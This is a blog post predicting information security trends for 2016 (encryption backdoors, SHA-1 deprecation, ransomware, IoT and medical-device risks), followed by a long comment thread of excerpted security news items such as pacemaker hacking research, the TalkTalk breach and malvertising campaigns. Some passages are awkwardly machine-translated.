Here are my predictions for trends in information security and cyber security for year 2016.
Year 2015 was bad for information security was pretty, and I would say that the trend is worrying. So I expect the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 there was Airplanes hacked, cars hacked, vulnerabilities in a breathtaking range of sensitive equipment from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016 and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.
Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and in the identification of target can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.
EU information security decisions made in late 2015 will have impact on what comes in 2016: New EU data protection legislation package approved and EU Court of Justice decision in which it noted the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under the Safe Harbor violation of law – you need some other agreement for this. The situation for this will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data-protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.
After huge amount of user information leaks in 2015 from all kinds of Internet services, there will the challenges for cloud companies to gain trust in their security. You might have just dared to trust “the right cloud services,” since in principle the traditional information security point of view, they seem to be the main things okay, rising this privacy issues raised.
New environments will bring new threats. New operating systems versions means that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important important in 2016 as 5G networks will be critical infrastructure, on top of which for example. transport, industry, health and the new operators set up their business around 2020.
The huge amount of information security information is becoming harder and harder to manage in 2016. A key problem in revelations as all other news coverage is the exponential growth of knowledge. There are variety of news summaries produced a daily basis, but they are not enough to get good picture of what is happening. There are bigger and smaller news, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.
Old way network security focused on perimeter defense is not enough in 2016. Old mantras “encrypt everything” and “secure the perimeter,” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: If you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to public key infrastructure lock-and-key system you will need also an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans to various kinds of breaches – with a strong focus on integrity.
Law enforcement versus Silicon Valley tension will continue to be strong throughout year 2016. In 2015 Law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes.Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that Governments Lie About Encryption Backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.
But this does not stop some government officials to demand such thing with varying success on different countries. Another fact is that The existence of coded communications is a reality and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: Encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access to government – ie, a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals - Juniper’s VPN security hole is proof that govt backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. The poorly thought-out and crude surveillance technique could have a devastating effect on the country’s internet security- as for example Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users install state-issued root certificate by January 1, 2016.
Google, Mozilla and Microsoft are pushing for early SHA-1 crypto cutoff that can happen in 2016 instead of earlier planned Jan 1st, 2017. Due to recent research showing that SHA-1 is weaker than previously believed, because it’s been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start display errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates in the end of 2016.
The use of Blockchain technology, permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will get used more widely than for just Bitcoin virtual money. With bitcoin, Blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces to create an alternative to the blockchain with Linux Foundation.
The use of disk encryption will increase and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or loose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security neeeds. The disadvantage of this approach is that Your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.
Weak leaking passwords are still huge security problem still in 2016. Passwords are often the weakest parts when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering in a code sent via text method to your phone – can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.
Google begins testing login system that uses phone notifications for authentication instead of passwords: authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in involving a push notification sent to your phone that then opens an app where you approve the log-in.
Smart phone will become more and more security critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. “We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”
Expect that number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?
Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years. I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP as “There are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business and mission-critical systems, both in private sector and government enterprises. For example US Navy is using obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s the wrong approach to information security completely.
Cars were hacked at record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars are featuring more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a five star Cyber Safety Framework to mitigate this threat in cars, hopefully car component makers study it.
IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms – not yet the weapon of choice for commercial malware authors – but business beware. Wearables won’t be safe, either, as they are built using largerly same too often vulnerable technologies as other IoT system. IoT security is still in in infancy in 2016.
Cyber criminals have become more active in 2015 particularly in the malicious the ransom fabrications. The ransom-malware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily and Exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransom-malware I recommend to ensure IT Support or your service provider the data back-up and restoring procedure operational, practiced and tested. You can need it in 2016 to get your data back without considering paying to criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
Ransomware will continue to dominate in 2016 and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held ransom to DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. Ransomware Is Coming to Medical Devices article tells that according to a report released recently week by Forrester Research the number one cybersecurity prediction for 2016: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint”. Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.
Keep in mind that everything connected to the Internet can, and will be hacked. In 2016 If You’re Not Paranoid, You’re Crazy. As government agencies and tech companies develop more and more intrusive means of watching and influencing people, how can we live free lives? Unfortunately I don’t have solution for that.
2,232 Comments
Tomi Engdahl says:
Nintendo Offers $20,000 for Vulnerabilities in 3DS Consoles
http://www.securityweek.com/nintendo-offers-20000-vulnerabilities-3ds-consoles
Nintendo announced on Monday the launch of a new bug bounty program for its 3DS handheld gaming systems. The company is prepared to offer between $100 and $20,000 for vulnerabilities found in the product.
The bug bounty program, hosted on HackerOne, is only for 3DS consoles – the company says it’s currently not interested in vulnerabilities affecting other platforms or services.
Nintendo is willing to pay for system flaws, such as privilege escalation or takeover issues affecting ARM11 and ARM9 processors. The company also encourages researchers to report vulnerabilities found in Nintendo applications, and hardware weaknesses that can be leveraged to obtain security keys or clone systems at a low cost.
Through its bug bounty program, Nintendo aims to prevent piracy, cheating and dissemination of inappropriate content to children.
https://hackerone.com/nintendo
Tomi Engdahl says:
Hacking Europe’s Smart Cities
http://www.securityweek.com/hacking-europes-smart-cities
Municipal planners in Europe are embracing digital technologies to deliver various services to the citizens. Smart-city services connect Internet-enabled sensors on buses, in rental bike racks, or parking meters, and then make use of an app or SMS with the citizen’s smartphone for payment. But Europe’s rich hacking culture has makers and breakers poking and prodding at these new systems every day. Many can figure out how to hack the services using simple techniques like replay to get free services or, in some cases, make a little bit of money.
This might sound like a lot of trouble to go through for free parking, but then students (and other young “maker” types) always have more time than money.
“At home you could make tickets to park your car in front of your home or you could make some tickets for where you are going. Or perhaps you’re hosting a party and feel like handing out free parking tickets to your guests. And some use a WiFi printer to print tickets in their car so all they had to do it cut them to size.” —a young hacker familiar with the app
Another Benelux city uses an SMS-based system to distribute one-hour tickets for the public transportation system. Unlike the parking receipts, the SMS tickets have a unique identifier, so they can’t actually be cloned. But hackers there made a web app that allows them to share tickets; one user pays for the first ticket, and if he only uses the transport for 20 minutes, there’s still 40 minutes left. That 40 minutes can be distributed to anyone else using the app. At the end of the month, each app subscriber receives a bill from the app (payable in Bitcoin, of course) for their distributed tickets. In a way, it’s a neat little system to claw back unused travel costs.
Another low-value hack involves the redemption of recyclable bottles at a grocery store. When a consumer finishes a case of beer or soft drinks, he can return the case and scan the barcode to receive a cash redemption.
In talking with Europeans, there are two perspectives on these citizen hacker activities. “It’s simple fraud,” said one man at a SecureLink conference in Belgium. A man opposite him disagreed: “It’s just gaming a system, and a citizen is within his right to take advantage where he can.”
The generation of city planners building the new smart cities need to remember this: humans are good at gaming any system. Actually, not good; they’re great. Give a group of people a set of rules, and they will quickly figure out how to beat the system.
Tomi Engdahl says:
Fatal flaws in ten pacemakers make for Denial of Life attacks
Brit/Belgian research team decipher signals and devise wounding wireless attacks
http://www.theregister.co.uk/2016/12/01/denial_of_life_attacks_on_pacemakers/
A global research team has hacked 10 different types of implantable medical devices and pacemakers finding exploits that could allow wireless remote attackers to kill victims.
Eduard Marin and Dave Singelée, researchers with KU Leuven University, Belgium, began examining the pacemakers under black box testing conditions in which they had no prior knowledge or special access to the devices, and used commercial off-the-shelf equipment to break the proprietary communications protocols.
From the position of blind attackers the pair managed to hack pacemakers from up to five metres away gaining the ability to deliver fatal shocks and turn off life-saving treatment.
The wireless attacks could also breach patient privacy, reading device information disclosing location history, treatments, and current state of health.
“We deliberately followed a black-box approach mimicking a less-skilled adversary that has no prior knowledge about the specification of the system.
“Using this black-box approach we just listened to the wireless communication channel and reverse-engineered the proprietary communication protocol. And once we knew all the zeros and ones in the message and their meaning, we could impersonate genuine readers and perform replay attacks etcetera.”
“Adversaries may eavesdrop the wireless channel to learn sensitive patient information, or even worse, send malicious messages to the implantable medical devices. The consequences of these attacks can be fatal for patients as these messages can contain commands to deliver a shock or to disable a therapy.”
On the (in)security of the Latest Generation Implantable Cardiac Defibrillators and How to Secure Them
https://www.esat.kuleuven.be/cosic/publications/article-2678.pdf
Tomi Engdahl says:
Face to face: What is awake security guru Harri Hurstia at night? “General Hazardous device that can destroy your life”
Security expert Harri Hurst believes that smartphone security is a bad way.
An internationally respected security consultant Harri Hursti arrives for an interview
Harri Hursti is concerned, in particular mobile phones, data security, because human life is now in smart phone. It is ugly if criminals can hack the phone.
- There is online banking, remote payments, and all personal information. Also, e-mail, with a different password is reset, is connected to the phone. You lose very quickly throughout your life, if you lose your phone. The mobile phone is a dangerous universal device that can destroy the whole of your life. When it is done electronically, you do not even know that you are a victim, he says.
According to Hurst specifically cybercrime and identity theft related to mobile phones are growing in the future.
- There are many ways to steal money from you. Phone is wonderful, because it is the key to all forms of milk you for money, Hursti says sarcastically.
- The safety of wireless networks is what it is. When the mobile phone has the Internet connection, it will automatically check the e-mails and Facebook messages, and this handshake may get caught. There are many techniques to disable SSL or tls can be deleted from connection.
He says that a criminal need any special skills, but technology and services can be purchased today from other criminals as a complete package: malicious programs are tailored by application and payment bring is handled conveniently with a stolen credit card.
- Criminals can do it even for free. They put their own side of the program, and say that the spread of this bank theft program, and our own grouch goes in it. It will only be activated 90 days later, that is, you will first clean up the bank, and then we sell them in the secondary market offerings
Criminals steal your identity and open accounts or make an insurance claim in your name – your mobile phone or computer data stolen from a tightened money from you – captured on a cell phone to send premium SMS bill.
If you’re lucky just your money and your information is stolen.
“It is the end of life, when you are on the accused”
- Even though the motive may be revenge. What if the phone is put in your knowledge of child pornography? It is a strong indictment and so emotional thing that at that point will be lost friends and it is difficult to find a lawyer. It is extremely easy to put the phone child pornography. It is the end of life, when you are on the accused, Hursti says.
The threat is already known. It rose to the surface, for example, last year when the hacking tools Hacking Team had to actually compromised. From the firm revealed the code, which was first interpreted as a way to download child pornography victims of the desired devices.
This code does not appear to have been used and may not even be able to use the staging of the victims as users of child pornography, but the threat is quite real in itself.
- If there is no argument about security, then it is better to take the phone anti-virus software. Also, the phone vpn tunneling (built between the two different systems of encryption device) can help a little bit, but does not help everything, Hursti says.
Sources:
http://www.iltasanomat.fi/digitoday/tietoturva/art-2000004895127.html?ref=rss
http://yle.fi/uutiset/3-9324782
Tomi Engdahl says:
TalkTalk’s wi-fi hack advice is ‘astonishing’
http://www.bbc.com/news/technology-38223805
TalkTalk’s handling of a wi-fi password breach is being criticised by several cyber-security experts.
The BBC has presented the company with evidence that many of its customers’ router credentials have been hacked, putting them at risk of data theft.
The UK broadband provider confirmed that the sample of stolen router IDs it had been shown was real.
But it is still advising users that there is “no need” to change their routers’ settings.
A cyber-security advisor to Europol said he was astounded by the decision.
“If TalkTalk has evidence that significant numbers of passwords are out in the wild, then at the very least they should be advising their customers to change their passwords,” said the University of Surrey’s Prof Alan Woodward.
“To say they see no need to do so is, frankly, astonishing.”
A spokeswoman for TalkTalk said that customers could change their settings “if they wish” but added that she believed there was “no risk to their personal information”.
She referred the BBC to another security expert. But when questioned, he also said the company should change its advice.
The BBC was subsequently contacted by someone who said he had access to a database of 57,000 router IDs that had been scraped before any fix had been rolled out.
He did not reveal his identity, but agreed to share a sample of the credentials that had been harvested.
The list contained details of about 100 routers including:
their service set identifier (SSID) codes and media access control (MAC) addresses. These can be entered into online tools that reveal the physical location of the routers
the router passwords, which would allow someone who travelled to the identified property to access the wi-fi network
The source said he wanted to highlight the problem because other more malevolent actors might have carried out a similar operation.
Prof Alan Woodward said once a hacker was outside a vulnerable property, they could:
snoop in the resident’s data, which might be clearly visible or encrypted in ways that still allowed the original information to be easily recovered
use the internet connection to mount an onward attack. The hacker could do this to hide their own identity or to co-opt the router to join an army of other compromised equipment in later DDoS (distributed denial of service) attacks
log in to the router as the administrator and mount a “man in the middle attack”, where apparently secure communications could be listened in on
substitute the router’s firmware with a modified version that provided a backdoor for later access even if the device was reset
‘Fast and loose’
TalkTalk’s spokeswoman referred the BBC to Steve Armstrong, a cyber-security instructor that she said would support it on the matter.
He said the risk to an individual user was relatively low.
“If you look at the average home user and what is on their home network, that would be exposed to an attacker,… then there is not a great deal.
“The risk is probably no higher than using a [coffee shop's] open wi-fi network.”
But he added that he still felt TalkTalk was giving the wrong advice.
“Part of my pushback to them is that they should be telling people, ‘You need to change your password,’” he said.
Boy, 17, admits TalkTalk hacking offences
http://www.bbc.com/news/uk-37990246
A 17-year-old boy has admitted hacking offences linked to a data breach at the communications firm TalkTalk, claiming he was “just showing off” to friends.
Norwich Youth Court was told he had used hacking tool software to identify vulnerabilities on target websites.
The data haul netted email addresses, names and phone numbers, as well as 21,000 unique bank account numbers and sort codes.
The boy pleaded guilty to seven charges and will be sentenced next month.
‘Relentless focus’
TalkTalk was fined a record £400,000 last month for security failings which allowed customers’ data to be accessed “with ease”.
The attack was branded a “car crash” by former information commissioner, Christopher Graham.
The company claimed the hack cost the firm £42m but has since reported a surge in half-year profits.
It said it also lost 98,000 broadband customers in the first half of the year, though this was largely offset by 69,000 new customers signing up.
Tomi Engdahl says:
Massive Stealthy Malvertising Campaign Uncovered
By Kevin Townsend on December 07, 2016
http://www.securityweek.com/massive-stealthy-malvertising-campaign-uncovered
A stealthy malvertising campaign has been flying under the radar for the last few months, targeting millions of readers visiting popular and mainstream news sites. The campaign is notable for stealth bordering on paranoia from the threat group, probably AdGholas.
In July 2016, Proofpoint published an analysis of a massive AdGholas malvertising campaign that it described as “using a sophisticated combination of techniques including sophisticated filtering and steganography.” It added that AdGholas had ceased operation following exposure, but “the scale and sophistication of this operation demonstrate the continued evolution and effectiveness of malvertising.”
Ultimately, the hidden code leads to the Astrum exploit kit — but neither automatically nor necessarily. The malicious code first uses a known Internet Explorer vulnerability CVE-2016-0162 to check for any sign of monitoring or analysis. If it detects a sandbox, or virtualization or certain security products it stops. Otherwise it sets up a one pixel iframe and redirects, via TinyURL, to the EK landing page.
The EK checks for Internet Explorer and loads a Flash file with three encrypted exploits. If it detects a vulnerable Flash version, the relevant exploit is run — otherwise, once again, it stops. If successful, writes ESET in an accompanying overview post, “the bad guys have all they need to download and execute the malware of their choice. Some of the payloads we analyzed include banking trojans, backdoors and spyware, but the victims could end up facing a nasty ransomware attack, for example.”
Tomi Engdahl says:
Hacker Holiday Havoc
http://www.securityweek.com/hacker-holiday-havoc
It’s that time of year again…when consumers, retailers and manufacturers need to understand and be alert to the latest cyber attacks that threaten to dampen the spirit and excitement of the holidays. This year we’re seeing two twists on some tried and true tactics that are cause for concern among the online gaming industry and retailers.
Gaming industry and DDoS
The use of botnets comprised of compromised IoT devices (cameras, DVRs, routers or other internet-connected hardware) is not a new development. But the recently discovered Mirai malware involved in attacks that targeted Krebs on Security, the French Internet Service Provider OVH, DynDNS and a mobile telecommunications provider in Liberia, have been some of the largest distributed denial of service (DDoS) attacks measured to date.
These attacks highlight the inherent vulnerability of basing network infrastructure around centralized DNS providers and the potential power of large IoT botnets to enable low capability actors to launch high impact attacks. Mirai spreads by scanning for IoT devices operating Telnet – a network protocol that allows a user on one computer to log onto another computer that is part of the same network – and then uses the default credentials in an attempt to brute-force access to the device.
Here are a few tips for how the gaming industry can protect itself and its customers:
• Change access credentials for devices and implement complex passwords.
• Evaluate your dependence on DNS, specifically for your most critical domains, and investigate the use of multiple DNS providers.
• Develop a DDoS process and review monitoring capabilities; to minimize downtime it is important to quickly identify the attack, characterize the attack traffic and take the appropriate action.
• Consider disabling all remote access to devices and perform administrative tasks internally – instead of Telnet, FTP and HTTP, use SSH, SFTP and HTTPS.
FastPOS malware aimed at retailers
POS malware is clearly under active development. To prevent and mitigate damage from such attacks retailers can:
• Conduct audits, penetration testing, assessments and red teaming exercises to understand your risk posture and attack surface.
• Consider PoS systems and networks as vital extensions of your enterprise environments; the technology that is used to protect the enterprise should be leveraged on PoS systems and networks where possible and, if not possible, comparable alternates should be sought out.
• Adopt technologies that are becoming more commonplace, such as chip and pin.
• Share intelligence with peers, for example in the form of an ISAC, for the betterment of the industry.
Tomi Engdahl says:
NSA, GCHQ Have Been Intercepting In-Flight Mobile Calls For Years
https://yro.slashdot.org/story/16/12/07/2141241/nsa-gchq-have-been-intercepting-in-flight-mobile-calls-for-years
American and British spies have since 2005 been working on intercepting phone calls and data transfers made from aircraft, France’s Le Monde newspaper reported on Wednesday, citing documents from former U.S. spy agency contractor Edward Snowden. According to the report, also carried by the investigative website The Intercept, Air France was targeted early on in the projects undertaken by the U.S. National Security Agency (NSA) and its British counterpart, GCHQ, after the airline conducted a test of phone communication based on the second-generation GSM standard in 2007.
U.S. and UK intelligence target airborne phone calls: report
http://www.reuters.com/article/us-airlines-data-surveillance-idUSKBN13W2Q0
Tomi Engdahl says:
Silver screen script hacker and dox douche gets 5 years in US cooler
Hello [celebrity], please reset your password
http://www.theregister.co.uk/2016/12/08/silver_screen_script_hacker_and_dox_douche_gets_5_years_in_us_cooler/
Bahamas man Alonzo Knowles has been sentenced to five years jail for hacking the email accounts of celebrities to steal and sell unreleased television and movie scripts, music, financial documents, and pornographic self footage.
Knowles plead guilty to criminal copyright infringement and identity theft in May and was sentenced this week by US District Judge Paul Engelmayer.
The 24-year-old hacker stole at least 25 unreleased TV and movie scripts including upcoming Tupac flick All Eyez On Me after tricking celebrities into filling their usernames and passwords into phishing emails.
Tomi Engdahl says:
Tests Reveal the Best Antivirus to Clean Up an Infected Windows PC
AV-TEST reveals most effective security products in case of a malware infection on a Windows 7 computer
http://news.softpedia.com/news/tests-reveal-the-best-antivirus-to-clean-up-an-infected-windows-pc-510784.shtml
Tomi Engdahl says:
Safety and Cybersecurity — You Can’t Have One Without the Other
Security planning needs to include safety. The two can no loner be separate concerns.
http://www.designnews.com/cyber-security/safety-and-cybersecurity-you-cant-have-one-without-other/61645859446201?cid=nl.x.dn14.edt.aud.dn.20161205.tst004c
Tomi Engdahl says:
Creepy Wireless Stalking Made Easy
http://hackaday.com/2016/12/04/creepy-wireless-stalking-made-easy/
In a slight twist on the august pursuit of warwalking, [Mehdi] took a Raspberry Pi armed with a GPS, WiFi, and a Bluetooth sniffer around Bordeaux with him for six months and logged all the data he could find. The result isn’t entirely surprising, but it’s still a little bit creepy.
If your WiFi sends out probe requests for its home access points, [Mehdi] logged it. If your Bluetooth devices leak information about what they are, [Mehdi] logged it. In the end, he got nearly 30,000 WiFis logged, including 120,000 probes. Each reading is timestamped and geolocated, and [Mehdi] presents a few of the results from querying the resulting database.
Bordeaux: a digital urban exploration
https://github.com/mehdilauters/wifiScanMap/blob/master/Results.md
You want to discover your city’s public transport infrastructure? If people crossing your street are mainly tourists or neighbors? Check if you always take the tram with a given person who likes pizza and travels? Or maybe more when your neighbor is at home or not right now, and use to be there at this time?
Tomi Engdahl says:
Phishing-as-a-service is making it easier than ever for hackers to steal your data
http://www.zdnet.com/article/phishing-as-a-service-is-making-it-easier-than-ever-for-hackers-to-steal-data/
Low-cost-of-entry schemes on the dark web mean any wannabe hacker can get their hands on the resources needed to phish specific targets.
Phishing is already the easiest way for hackers to steal data and it’s getting even easier thanks to the rise of organised criminal groups on the dark web offering phishing-as-a-service schemes to budding cybercriminals and ever-lowering the cost of entry.
According to cybersecurity researchers, this approach to phishing is about a quarter of the cost and twice as profitable as traditional unmanaged — and labour intensive — phishing campaigns and follows in the footsteps of other cybercrime-as-a-service campaigns.
The ‘Phishing made easy’ report from Imperva’s Hacker Intelligence Initiative details how a Phishing-as-a-Service (PhaaS) store on the Russian black market offers a “complete solution for the beginner scammer” including databases of emails, templates of phishing scams, and a backend database to store stolen credentials.
at a cost of a maximum of just 270 rubles a month ($4.23), the scammer would be able to make back the cost in no time by stealing and selling profiles.
https://www.imperva.com/docs/Imperva-HII-phishing-made-easy.pdf
Tomi Engdahl says:
Suspects arrested in Russia central bank cyberheist: bank official
http://www.reuters.com/article/us-russia-cenbank-cyberattack-idUSKBN13W2AK?feedType=RSS&feedName=technologyNews&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+reuters%2FtechnologyNews+%28Reuters+Technology+News%29
Russian authorities arrested a large number of suspects in May in connection with the recently revealed electronic theft of $19 million from accounts held at the Russian central bank, an official said on Wednesday.
The bank said last week that hackers had this year used fake client credentials to steal money from correspondent accounts — used to handle transactions on behalf of another bank — at the Bank of Russia.
Banks around the world are tightening the security of their messaging and money transfer networks following a number of cyberattacks – most notably the use of stolen Bangladesh Bank credentials to send SWIFT messages requesting the transfer of nearly $1 billion from its correspondent account at the New York Federal Reserve. The hackers succeeded in transferring $81 million to four accounts in Manila.
Tomi Engdahl says:
US commission whistles to FIDO: Help end ID-based hacks by 2021
No breaches should result from compromised identities, say gov bods
http://www.theregister.co.uk/2016/12/08/us_commission_cybersecurity_recommendations/
A White House commission on improving cybersecurity has come up with a list of recommendations for US president-elect Donald Trump’s administration – including a target for no big hacks to involve identity-based compromises.
The US Commission on Enhancing National Cybersecurity has identified 16 key recommendations on security and growing the digital economy.
Tomi Engdahl says:
Adobe Flash Responsible For Six of the Top 10 Bugs Used By Exploit Kits In 2016
https://it.slashdot.org/story/16/12/08/0011230/adobe-flash-responsible-for-six-of-the-top-10-bugs-used-by-exploit-kits-in-2016
Vulnerabilities in Flash and Internet Explorer dominated the exploit kit landscape in the last year, with a high-profile bug in Flash being found in seven separate kits, new research shows. Exploit kits have long been a key tool in the arsenal of many attackers, from low-level gangs to highly organized cybercrime crews. Their attraction stems from their ease of use and the ability for attackers to add exploits for new vulnerabilities as needed.
Flash Bugs Dominate Exploit Kit Landscape
https://www.onthewire.io/flash-bugs-dominate-exploit-kit-landscape/
Tomi Engdahl says:
Expedia IT guy made $300,000 by hacking own execs
http://money.cnn.com/2016/12/05/technology/expedia-hack-insider-trading-sec/
A former Expedia IT professional admitted on Monday to illegally trading on secrets he discovered by hacking his own company’s senior executives.
Jonathan Ly stole passwords and infiltrated devices of Expedia’s (EXPE) chief financial officer and head of investor relations, allowing him to make a series of “highly profitable” trades in stock options that scored him $331,000, according to prosecutors.
U.S. Attorney Annette Hayes said in a statement that an FBI investigation revealed that Ly “used his employer’s networks to facilitate a get-rich-quick scheme.”
Tomi Engdahl says:
DDoS platform lures hackers to attack websites for points and prizes
The gamification lures hackers into the fold with exploit tools and fraud software up for grabs.
http://www.zdnet.com/article/hackers-turn-ddos-attacks-into-a-game-for-points-and-prizes/
A Turkish cyberattack group is luring individuals to join a DDoS platform to compete for points through games which can be redeemed for hacking tools.
The platform, dubbed Surface Defense, asks hackers to attack political websites using a distributed denial-of-service (DDoS) tool called Balyoz, translated as Sledgehammer.
In order to participate, users recruited from hacking forums must download the Surface Defense collaboration software and register. The platform program then runs locally on a PC, prompting the download of the DDoS attack tool to assault the limited list of target websites.
Traffic is then routed through Tor to disrupt online services.
For every ten minutes spent hammering these websites with fraudulent traffic, participants receive one point which can be traded for tools including a standalone version of Sledgehammer for conducting their own DDoS attacks and “click-fraud” bots used to generate revenue through pay-to-click schemes.
According to Forcepoint Security Labs (.PDF) which discovered the scheme in Turkish Dark Web hacking forums Turkhackteam and Root Developer, a total of 24 websites are on the current list of targets.
https://www.forcepoint.com/sites/default/files/resources/files/datasheet_sledgehammer_the_gamification_of_ddos_attacks_en.pdf
Tomi Engdahl says:
Antivirus is a misnomer. Antivirus companies are no longer just antivirus; but the name has stuck. Everybody accepts that antivirus alone is no longer enough to keep computers and networks safe — but because of the misnomer, new next-gen machine learning endpoint protection vendors have been able to take center stage as antivirus replacement products. Legacy antivirus vendors, like Symantec, Sophos and McAfee have been compelled to release new products to rid themselves of the legacy association. Today Malwarebytes became the latest with the launch of Malwarebytes 3.0.
Source: http://www.securityweek.com/malwarebytes-replaces-antivirus-new-version-30
Tomi Engdahl says:
Cryptography Expert to Audit OpenVPN
http://www.securityweek.com/cryptography-expert-audit-openvpn
VPN service provider Private Internet Access has contracted cryptography expert Matthew Green to conduct a comprehensive audit of the open-source VPN application OpenVPN.
Green, who is a professor of computer science and researcher at Johns Hopkins University in Baltimore, was also involved in auditing the file and disk encryption software TrueCrypt as part of the Open Crypto Audit Project (OCAP).
